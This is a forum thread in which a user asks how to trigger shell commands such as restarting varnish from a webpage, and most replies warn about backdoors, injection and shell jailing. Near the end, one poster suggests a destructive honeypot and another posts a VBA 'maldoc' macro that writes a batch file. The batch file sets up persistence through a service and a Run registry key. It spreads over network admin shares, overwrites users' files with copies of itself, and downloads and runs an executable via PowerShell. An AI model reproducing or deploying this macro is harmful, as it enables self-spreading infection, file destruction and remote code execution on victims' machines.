User Controls
Issuing shell commands from a webpage?
-
2019-08-28 at 9:15 PM UTCI would like to be able to basically do a couple of commands - eg service varnish restart (as root) from a webpage.
Is that doable? -
2019-08-28 at 9:23 PM UTC/etc/varnish/default.vcl
backend default {
.host = "localhost";
.port = "8080";
} -
2019-08-28 at 9:35 PM UTCLol, that looks familiar alright.
Anyway I have my vcl file as good as I'm going to get it for now. -
2019-08-28 at 9:37 PM UTCAnd varnish is supporting 1000 simultaneous requests, which is A) awesome and B) the goal.
Now it's time to worry about allowing people to actually update the website, keeping in mind that the backend takes like 6 seconds to respond, so allowing clients to hit it simply isn't an option.
Which means that a cache-warming strategy is a necessity. Which we have, but I need to be able to call it without requiring an SSH session. -
2019-08-29 at 12:27 AM UTC
-
2019-08-29 at 11:54 PM UTCIts actually quite easy but unsafe. This is of course if you're referring to accessing a webpage that's hosted on a server that you control.
-
2019-08-31 at 9:50 PM UTC
Originally posted by Admin Its actually quite easy but unsafe. This is of course if you're referring to accessing a webpage that's hosted on a server that you control.
Yeah, this. You can stand up a small web server that runs a commands taken from requests to it but that's wildly insecure and basically backdooring yourself. You can set it up to run a specific command when a request is made but you have to worry about things like "what happens if someone requests this a thousand times in a second" or "do I take any parameters from the request that can be open me up to injection attacks" and such. And if you're spawning a shell you have to ask "who's profile is this sourcing and what happens when that changes".
I mean in some sense every HTTP request is "run some command on a remote server and maybe provide some data back" but shells and subprocesses are tricky and just require you to think about all the ways that they can be exploited or fail.
-
2019-08-31 at 10:33 PM UTCThanks.
I got the cache refreshing just fine using by getting varnish to serve up files, and also refresh the cache object after the file has been served. This enables the people updating the site to avoid having to use any control interface beside just waiting 10 seconds and refreshing, and also ensures no customer ever has to wait for the slow-ass backend to work.
TBH setting it up was all far more complicated than it should have been. -
2019-09-01 at 10:40 AM UTCIf you absolutely have to spawn a shell. Permission jail it. Make sure it can't do anything else than what you want it to do, read up on breaking out of a jailed shell too if you wanna do your due diligence. I'd council against it in general though. It's a good way of getting owned.The following users say it would be alright if the author of this post didn't die in a fire!
-
2019-09-01 at 10:52 AM UTCyeah I would not recommend using it more than once. if you need remote terminal access set up ssh
***or in your case, some sort of conditional trigger for the script -
2019-09-01 at 12:25 PM UTCJust message her on FB.The following users say it would be alright if the author of this post didn't die in a fire!
-
2019-09-02 at 11:54 PM UTCIt's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.
-
2019-09-03 at 1:43 AM UTC
Originally posted by Admin It's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.
Best to setup a malicious honey pot, so when they try to exploit the hole, they end up getting infected with a rootkit that deletes their entire harddrive instead. -
2019-09-03 at 7:11 PM UTC
-
2019-09-03 at 7:23 PM UTC
Originally posted by -SpectraL Best to setup a malicious honey pot, so when they try to exploit the hole, they end up getting infected with a rootkit that deletes their entire harddrive instead.
You're over thinking it. Just set up a regular honeypot, put some important looking documents in there somewhere. But make sure all these documents are actually MalDocs.
In fact i'm taking a little break from coding at the moment but i had this open in my text editor as well.
Public Sub ware()
Const s = "c:\s.bat"
Dim FileNumber As Integer
Dim retVal As Variant
FileNumber = FreeFile
'creat batch file
Open s For Output As #FileNumber
Print #FileNumber, "@echo off"
Print #FileNumber, "set gg=0"
Print #FileNumber, "set servicename=DE"
Print #FileNumber, "echo sc create %servicename% binpath=%0 >> service.bat"
Print #FileNumber, "echo sc start %servicename% >> service.bat"
Print #FileNumber, "attrib +h +r +s service.bat"
Print #FileNumber, "start service.bat"
Print #FileNumber, "reg add "; HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run; " /v "; Windows; Services; " /t "; REG_SZ; " /d %0"
Print #FileNumber, "attrib +h +r +s %0"
Print #FileNumber, ":abdhd"
Print #FileNumber, "net use Z: \\192.168.1.%gg%\C$"
Print #FileNumber, "if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.bat""
Print #FileNumber, "mountvol Z: /d)"
Print #FileNumber, "if %i% == 256 (goto infect) else (set /a i=i+1)"
Print #FileNumber, "goto abdhd"
Print #FileNumber, ":infect"
Print #FileNumber, "for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)"
Print #FileNumber, "for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)"
Print #FileNumber, ":payload"
Print #FileNumber, "powershell -Command "(New-Object Net.WebClient).DownloadFile('Direct Link Here', 'Download_Execute.exe')""
Print #FileNumber, "powershell -Command "Invoke-WebRequest <Direct Link Here> -OutFile Downoad_Execute.exe""
Print #FileNumber, "start %USERPROFILE%\Downloads\Download_Execute.exe"
Close #FileNumber
'run batch file
retVal = Shell(MY_FILENAME, vbNormalFocus)
' NOTE THE BATCH FILE WILL RUN, BUT THE CODE WILL CONTINUE TO RUN.
If retVal = 0 Then
MsgBox "An Error Occured"
Close #FileNumber
End
End If
'Delete batch file
Kill MY_FILENAME
End Sub
I didn't write this but i was messing around with it the other day. I also found out that LibreOffice supports Macros as well. So instead of jumping through hoops with executables and batch files and random PowerShell invocations and shit, you could have your Macro simply download a python script and execute it directly if the adversary is on Linux.
